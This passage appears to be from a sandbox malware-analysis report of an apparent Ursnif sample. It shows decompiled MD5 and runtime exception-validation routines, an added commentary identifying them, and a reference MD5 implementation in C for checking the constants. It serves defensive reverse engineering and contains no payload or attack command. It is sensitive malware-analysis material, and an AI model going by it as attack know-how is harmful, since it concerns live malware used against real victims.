                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E1D
                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E29
                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E54
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                            • Instruction ID: e33da94240e42017e136f62dc95d94f46ab2aa21f49a2b0c7d3ad8cb7630979a
                            • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                            • Instruction Fuzzy Hash: EA023270901B218FC775DF29C690567B7F0BF45724BA14E2ED6E78AA90DA31F48ACB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                            • Instruction ID: 35982ce4d1c4511cff5587cce69a18ebc2ba4a63f8fb69df393c5af1f9fcedbe
                            • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                            • Instruction Fuzzy Hash: F722857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E04A14BF1(void* __ecx, intOrPtr* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				void _v76;
                            				intOrPtr* _t226;
                            				signed int _t229;
                            				signed int _t231;
                            				signed int _t233;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t241;
                            				signed int _t243;
                            				signed int _t245;
                            				signed int _t247;
                            				signed int _t249;
                            				signed int _t251;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t257;
                            				signed int _t259;
                            				signed int _t338;
                            				signed char* _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				signed int _t353;
                            				signed int _t355;
                            				signed int _t357;
                            				signed int _t359;
                            				signed int _t361;
                            				signed int _t363;
                            				signed int _t365;
                            				signed int _t367;
                            				signed int _t376;
                            				signed int _t378;
                            				signed int _t380;
                            				signed int _t382;
                            				signed int _t384;
                            				intOrPtr* _t400;
                            				signed int* _t401;
                            				signed int _t402;
                            				signed int _t404;
                            				signed int _t406;
                            				signed int _t408;
                            				signed int _t410;
                            				signed int _t412;
                            				signed int _t414;
                            				signed int _t416;
                            				signed int _t418;
                            				signed int _t420;
                            				signed int _t422;
                            				signed int _t424;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t436;
                            				signed int _t438;
                            				signed int _t440;
                            				signed int _t508;
                            				signed int _t599;
                            				signed int _t607;
                            				signed int _t613;
                            				signed int _t679;
                            				void* _t682;
                            				signed int _t683;
                            				signed int _t685;
                            				signed int _t690;
                            				signed int _t692;
                            				signed int _t697;
                            				signed int _t699;
                            				signed int _t718;
                            				signed int _t720;
                            				signed int _t722;
                            				signed int _t724;
                            				signed int _t726;
                            				signed int _t728;
                            				signed int _t734;
                            				signed int _t740;
                            				signed int _t742;
                            				signed int _t744;
                            				signed int _t746;
                            				signed int _t748;
                            
                            				_t226 = _a4;
                            				_t348 = __ecx + 2;
                            				_t401 =  &_v76;
                            				_t682 = 0x10;
                            				do {
                            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                            					_t401 =  &(_t401[1]);
                            					_t348 =  &(_t348[4]);
                            					_t682 = _t682 - 1;
                            				} while (_t682 != 0);
                            				_t6 = _t226 + 4; // 0x14eb3fc3
                            				_t683 =  *_t6;
                            				_t7 = _t226 + 8; // 0x8d08458b
                            				_t402 =  *_t7;
                            				_t8 = _t226 + 0xc; // 0x56c1184c
                            				_t349 =  *_t8;
                            				asm("rol eax, 0x7");
                            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                            				asm("rol ecx, 0xc");
                            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                            				asm("ror edx, 0xf");
                            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                            				asm("ror esi, 0xa");
                            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                            				_v8 = _t685;
                            				_t690 = _v8;
                            				asm("rol eax, 0x7");
                            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                            				asm("rol ecx, 0xc");
                            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                            				asm("ror edx, 0xf");
                            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                            				asm("ror esi, 0xa");
                            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                            				_v8 = _t692;
                            				_t697 = _v8;
                            				asm("rol eax, 0x7");
                            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                            				asm("rol ecx, 0xc");
                            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                            				asm("ror edx, 0xf");
                            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                            				asm("ror esi, 0xa");
                            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                            				_v8 = _t699;
                            				asm("rol eax, 0x7");
                            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                            				asm("rol ecx, 0xc");
                            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                            				_t508 =  !_t357;
                            				asm("ror edx, 0xf");
                            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                            				_v12 = _t410;
                            				_v12 =  !_v12;
                            				asm("ror esi, 0xa");
                            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                            				asm("rol eax, 0x5");
                            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                            				asm("rol ecx, 0x9");
                            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                            				asm("rol edx, 0xe");
                            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                            				asm("ror esi, 0xc");
                            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                            				asm("rol eax, 0x5");
                            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                            				asm("rol ecx, 0x9");
                            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                            				asm("rol edx, 0xe");
                            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                            				asm("ror esi, 0xc");
                            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                            				asm("rol eax, 0x5");
                            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                            				asm("rol ecx, 0x9");
                            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                            				asm("rol edx, 0xe");
                            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                            				asm("ror esi, 0xc");
                            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                            				asm("rol eax, 0x5");
                            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                            				asm("rol ecx, 0x9");
                            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                            				asm("rol edx, 0xe");
                            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                            				asm("ror esi, 0xc");
                            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                            				asm("rol eax, 0x4");
                            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                            				asm("rol ecx, 0xb");
                            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                            				asm("rol edx, 0x10");
                            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                            				_t599 = _t367 ^ _t420;
                            				asm("ror esi, 0x9");
                            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                            				asm("rol eax, 0x4");
                            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                            				asm("rol edi, 0xb");
                            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                            				asm("rol edx, 0x10");
                            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                            				_t338 = _t607 ^ _t422;
                            				asm("ror ecx, 0x9");
                            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                            				asm("rol eax, 0x4");
                            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                            				asm("rol esi, 0xb");
                            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                            				asm("rol edi, 0x10");
                            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                            				_t424 = _t734 ^ _t613;
                            				asm("ror ecx, 0x9");
                            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                            				asm("rol eax, 0x4");
                            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                            				asm("rol edx, 0xb");
                            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                            				asm("rol esi, 0x10");
                            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                            				asm("ror ecx, 0x9");
                            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                            				asm("rol eax, 0x6");
                            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                            				asm("rol edx, 0xa");
                            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                            				asm("rol esi, 0xf");
                            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                            				asm("ror ecx, 0xb");
                            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                            				asm("rol eax, 0x6");
                            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                            				asm("rol edx, 0xa");
                            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                            				asm("rol esi, 0xf");
                            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                            				asm("ror ecx, 0xb");
                            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                            				asm("rol eax, 0x6");
                            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                            				asm("rol edx, 0xa");
                            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                            				asm("rol esi, 0xf");
                            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                            				asm("ror edi, 0xb");
                            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                            				asm("rol eax, 0x6");
                            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                            				asm("rol edx, 0xa");
                            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                            				_t400 = _a4;
                            				asm("rol esi, 0xf");
                            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                            				 *_t400 =  *_t400 + _t259;
                            				asm("ror eax, 0xb");
                            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                            				return memset( &_v76, 0, 0x40);
                            			}
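The decompiled routine E04A14BF1 above is an MD5 compression function: it loads sixteen little-endian words from the 64-byte block passed in ECX into _v76.._v16, runs 64 rounds whose rotation amounts (rol 7/12, ror 15 = rol 17, ror 10 = rol 22, then 5/9/14/20, 4/11/16/23 and 6/10/15/21) and boolean functions are MD5's, adds the result into the four-word state at the stack argument, and wipes the message schedule with memset before returning. The decompiler prints the round constants as signed literals (- 0x28955b88 is 0xd76aa478 mod 2^32), so reducing them modulo 2^32 and comparing against RFC 1321's T table is the quickest way to confirm the identification instead of guessing from the shape alone. The reference implementation below is an added example written for this page, not code from the report or recovered from the sample; the only thing it takes from the report is the list of 64 signed constants transcribed from the decompile, which it checks against the T table, and it verifies the transform itself with the RFC 1321 test vectors.

```c
/* Added example, not from the Joe Sandbox report and not code recovered from the sample.
 * Reference MD5 (RFC 1321) written to mirror the shape of the decompiled E04A14BF1:
 * 16 little-endian word loads, 64 rounds in four groups with rotations 7/12/17/22,
 * 5/9/14/20, 4/11/16/23 and 6/10/15/21, then state += (a, b, c, d). The decompiler
 * shows the round constants as signed literals; reduced mod 2^32 they are MD5's T[i]. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const uint32_t MD5_T[64] = {          /* floor(2^32 * |sin(i + 1)|) */
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 };

static const unsigned MD5_S[64] = {
    7,12,17,22, 7,12,17,22, 7,12,17,22, 7,12,17,22,  5,9,14,20, 5,9,14,20, 5,9,14,20, 5,9,14,20,
    4,11,16,23, 4,11,16,23, 4,11,16,23, 4,11,16,23,  6,10,15,21, 6,10,15,21, 6,10,15,21, 6,10,15,21 };

/* The 64 additive constants as the decompiler printed them in E04A14BF1, in round order. */
static const long long DECOMPILED_CONSTS[64] = {
    -0x28955b88, -0x173848aa,  0x242070db, -0x3e423112,  -0xa83f051,  0x4787c62a, -0x57cfb9ed,  -0x2b96aff,
     0x698098d8, -0x74bb0851,     -0xa44f, -0x76a32842,  0x6b901122,  -0x2678e6d, -0x5986bc72,  0x49b40821,
     -0x9e1da9e, -0x3fbf4cc0,  0x265e5a51, -0x16493856, -0x29d0efa3,   0x2441453, -0x275e197f, -0x182c0438,
     0x21e1cde6, -0x3cc8f82a,  -0xb2af279,  0x455a14ed, -0x561c16fb,  -0x3105c08,  0x676f02d9, -0x72d5b376,
       -0x5c6be, -0x788e097f,  0x6d9d6122,  -0x21ac7f4, -0x5b4115bc,  0x4bdecfa9,  -0x944b4a0, -0x41404390,
     0x289b7ec6, -0x155ed806, -0x2b10cf7b,   0x4881d05, -0x262b2fc7, -0x1924661b,  0x1fa27cf8, -0x3b53a99b,
     -0xbd6ddbc,  0x432aff97, -0x546bdc59,  -0x36c5fc7,  0x655b59c3, -0x70f3336e,   -0x100b83, -0x7a7ba22f,
     0x6fa87e4f,  -0x1d31920, -0x5cfebcec,  0x4e0811a1,  -0x8ac817e, -0x42c50dcb,  0x2ad7d2bb, -0x14792c6f };

/* A signed decompiler literal is the two's-complement view of the 32-bit constant. */
uint32_t md5_const_from_signed(long long v) { return (uint32_t)(v & 0xffffffffLL); }

/* 1 if every decompiled constant equals the MD5 T value for its round, else 0. */
int md5_decompiled_constants_match(void) {
    for (int i = 0; i < 64; i++)
        if (md5_const_from_signed(DECOMPILED_CONSTS[i]) != MD5_T[i]) return 0;
    return 1;
}

static uint32_t rol32(uint32_t x, unsigned n) { return (x << n) | (x >> (32 - n)); }

/* One compression of a 64-byte block into state[4]: the work E04A14BF1 does. */
void md5_block(uint32_t state[4], const uint8_t block[64]) {
    uint32_t M[16];
    for (int i = 0; i < 16; i++)   /* same byte order as the decompiled load loop */
        M[i] = (uint32_t)block[4*i] | (uint32_t)block[4*i+1] << 8
             | (uint32_t)block[4*i+2] << 16 | (uint32_t)block[4*i+3] << 24;
    uint32_t a = state[0], b = state[1], c = state[2], d = state[3];
    for (int i = 0; i < 64; i++) {
        uint32_t f; unsigned g;
        if (i < 16)      { f = (b & c) | (~b & d); g = i; }              /* F: "!b & d | c & b" above */
        else if (i < 32) { f = (d & b) | (~d & c); g = (5*i + 1) % 16; } /* G */
        else if (i < 48) { f = b ^ c ^ d;          g = (3*i + 5) % 16; } /* H: "b ^ c ^ d" above */
        else             { f = c ^ (b | ~d);       g = (7*i) % 16; }     /* I: "(!d | b) ^ c" above */
        uint32_t tmp = d;
        d = c; c = b;
        b = b + rol32(a + f + M[g] + MD5_T[i], MD5_S[i]);
        a = tmp;
    }
    state[0] += a; state[1] += b; state[2] += c; state[3] += d;
}

/* Full MD5 with RFC 1321 padding; writes 32 hex characters plus NUL. */
void md5_hex(const uint8_t *msg, size_t len, char out[33]) {
    uint32_t st[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 };
    size_t i = 0;
    for (; i + 64 <= len; i += 64) md5_block(st, msg + i);
    uint8_t buf[128] = { 0 };
    size_t rem = len - i;
    memcpy(buf, msg + i, rem);
    buf[rem] = 0x80;
    size_t total = (rem + 9 <= 64) ? 64 : 128;   /* second block only if the length field does not fit */
    uint64_t bits = (uint64_t)len * 8;
    for (int k = 0; k < 8; k++) buf[total - 8 + k] = (uint8_t)(bits >> (8*k));
    md5_block(st, buf);
    if (total == 128) md5_block(st, buf + 64);
    for (int k = 0; k < 4; k++)                  /* digest is the state in little-endian byte order */
        sprintf(out + 8*k, "%02x%02x%02x%02x", (unsigned)(st[k] & 0xff), (unsigned)((st[k] >> 8) & 0xff),
                (unsigned)((st[k] >> 16) & 0xff), (unsigned)(st[k] >> 24));
}

/* Compare the digest of a NUL-terminated message against a known hex digest. */
int md5_hex_equals(const char *msg, const char *expected_hex) {
    char h[33];
    md5_hex((const uint8_t *)msg, strlen(msg), h);
    return strcmp(h, expected_hex) == 0;
}

int main(void) {
    char h[33];
    md5_hex((const uint8_t *)"abc", 3, h);
    printf("decompiled constants match MD5 T[]: %d\nmd5(\"abc\") = %s\n", md5_decompiled_constants_match(), h);
    return 0;
}
```

Running the check against all 64 literals rather than the first one or two matters in practice: Gozi/Ursnif builds are known to tweak standard primitives, and a single changed constant or rotation amount would turn a "looks like MD5" routine into something whose output no off-the-shelf tool will reproduce. Here every constant and every rotation is standard, so hashes the sample computes with this routine can be recomputed with any MD5 library when building detection or decrypting its configuration.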

                             [Per-line address column for the function above (Joe Sandbox IDA plugin), covering 0x04a14bf4 to 0x04a15299; the line-by-line pairing with the C code is not preserved here.]


                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                            • Instruction ID: 95bbaed0c66f636092543369435f8a2c614d658ffc67b69e4860991b1d1ef1d1
                            • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                            • Instruction Fuzzy Hash: B322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: d9c3ad45da20a701a551a10000620ec3ab6216f876ff83bb5e962b556fc55341
                            • Instruction ID: 49ecf751d4d2a9501e8ea27212f63bd83404a3b6fc2c9fac75ba9d9746c6f138
                            • Opcode Fuzzy Hash: d9c3ad45da20a701a551a10000620ec3ab6216f876ff83bb5e962b556fc55341
                            • Instruction Fuzzy Hash: 3D425430A04B458FDB29CF69C4806AABBF1FF49304F58896ED49BDB651E734B486CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                             C-Code - Quality: 100%
                             			// Decompiler output (Joe Sandbox). The structure matches the MSVC x86 CRT routine _ValidateEH3,
                             			// which validates an SEH3 exception registration record before its handler is trusted:
                             			// the scope table (record+8) must be 4-byte aligned and must not lie on the stack (fs:[4] /
                             			// fs:[8] are the TEB StackBase / StackLimit); each 12-byte scope entry up to the current
                             			// trylevel (record+0xC) must nest outward; if any entry has a filter, SavedESP (record-8)
                             			// must sit inside the stack below the record; the page holding the table must be MEM_IMAGE
                             			// (Type 0x1000000 in the 0x1c-byte MEMORY_BASIC_INFORMATION). A writable page (Protect & 0xCC)
                             			// is accepted only after walking the MZ/PE headers and confirming the table is not inside a
                             			// writable first section (Characteristics bit 0x80000000). Validated pages are cached in the
                             			// 16-entry array at 0x4a1a388 (count at 0x4a1a380, lock flag at 0x4a1a3c8). This is statically
                             			// linked runtime code, not Ursnif-specific logic.
                             			E04A184C1(long _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				short* _v32;
                            				void _v36;
                            				void* _t57;
                            				signed int _t58;
                            				signed int _t61;
                            				signed int _t62;
                            				void* _t63;
                            				signed int* _t68;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t78;
                            				void _t80;
                            				signed int _t81;
                            				signed int _t84;
                            				signed int _t86;
                            				short* _t87;
                            				void* _t89;
                            				signed int* _t90;
                            				long _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				signed int _t102;
                            				void* _t104;
                            				long _t108;
                            				signed int _t110;
                            
                            				_t108 = _a4;
                            				_t76 =  *(_t108 + 8);
                            				if((_t76 & 0x00000003) != 0) {
                            					L3:
                            					return 0;
                            				}
                            				_a4 =  *[fs:0x4];
                            				_v8 =  *[fs:0x8];
                            				if(_t76 < _v8 || _t76 >= _a4) {
                            					_t102 =  *(_t108 + 0xc);
                            					__eflags = _t102 - 0xffffffff;
                            					if(_t102 != 0xffffffff) {
                            						_t91 = 0;
                            						__eflags = 0;
                            						_a4 = 0;
                            						_t57 = _t76;
                            						do {
                            							_t80 =  *_t57;
                            							__eflags = _t80 - 0xffffffff;
                            							if(_t80 == 0xffffffff) {
                            								goto L9;
                            							}
                            							__eflags = _t80 - _t91;
                            							if(_t80 >= _t91) {
                            								L20:
                            								_t63 = 0;
                            								L60:
                            								return _t63;
                            							}
                            							L9:
                            							__eflags =  *(_t57 + 4);
                            							if( *(_t57 + 4) != 0) {
                            								_t12 =  &_a4;
                            								 *_t12 = _a4 + 1;
                            								__eflags =  *_t12;
                            							}
                            							_t91 = _t91 + 1;
                            							_t57 = _t57 + 0xc;
                            							__eflags = _t91 - _t102;
                            						} while (_t91 <= _t102);
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L15:
                            							_t81 =  *0x4a1a380; // 0x0
                            							_t110 = _t76 & 0xfffff000;
                            							_t58 = 0;
                            							__eflags = _t81;
                            							if(_t81 <= 0) {
                            								L18:
                            								_t104 = _t102 | 0xffffffff;
                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                            								__eflags = _t61;
                            								if(_t61 < 0) {
                            									_t62 = 0;
                            									__eflags = 0;
                            								} else {
                            									_t62 = _a4;
                            								}
                            								__eflags = _t62;
                            								if(_t62 == 0) {
                            									L59:
                            									_t63 = _t104;
                            									goto L60;
                            								} else {
                            									__eflags = _v12 - 0x1000000;
                            									if(_v12 != 0x1000000) {
                            										goto L59;
                            									}
                            									__eflags = _v16 & 0x000000cc;
                            									if((_v16 & 0x000000cc) == 0) {
                            										L46:
                            										_t63 = 1;
                            										 *0x4a1a3c8 = 1;
                            										__eflags =  *0x4a1a3c8;
                            										if( *0x4a1a3c8 != 0) {
                            											goto L60;
                            										}
                            										_t84 =  *0x4a1a380; // 0x0
                            										__eflags = _t84;
                            										_t93 = _t84;
                            										if(_t84 <= 0) {
                            											L51:
                            											__eflags = _t93;
                            											if(_t93 != 0) {
                            												L58:
                            												 *0x4a1a3c8 = 0;
                            												goto L5;
                            											}
                            											_t77 = 0xf;
                            											__eflags = _t84 - _t77;
                            											if(_t84 <= _t77) {
                            												_t77 = _t84;
                            											}
                            											_t94 = 0;
                            											__eflags = _t77;
                            											if(_t77 < 0) {
                            												L56:
                            												__eflags = _t84 - 0x10;
                            												if(_t84 < 0x10) {
                            													_t86 = _t84 + 1;
                            													__eflags = _t86;
                            													 *0x4a1a380 = _t86;
                            												}
                            												goto L58;
                            											} else {
                            												do {
                            													_t68 = 0x4a1a388 + _t94 * 4;
                            													_t94 = _t94 + 1;
                            													__eflags = _t94 - _t77;
                            													 *_t68 = _t110;
                            													_t110 =  *_t68;
                            												} while (_t94 <= _t77);
                            												goto L56;
                            											}
                            										}
                            										_t69 = 0x4a1a384 + _t84 * 4;
                            										while(1) {
                            											__eflags =  *_t69 - _t110;
                            											if( *_t69 == _t110) {
                            												goto L51;
                            											}
                            											_t93 = _t93 - 1;
                            											_t69 = _t69 - 4;
                            											__eflags = _t93;
                            											if(_t93 > 0) {
                            												continue;
                            											}
                            											goto L51;
                            										}
                            										goto L51;
                            									}
                            									_t87 = _v32;
                            									__eflags =  *_t87 - 0x5a4d;
                            									if( *_t87 != 0x5a4d) {
                            										goto L59;
                            									}
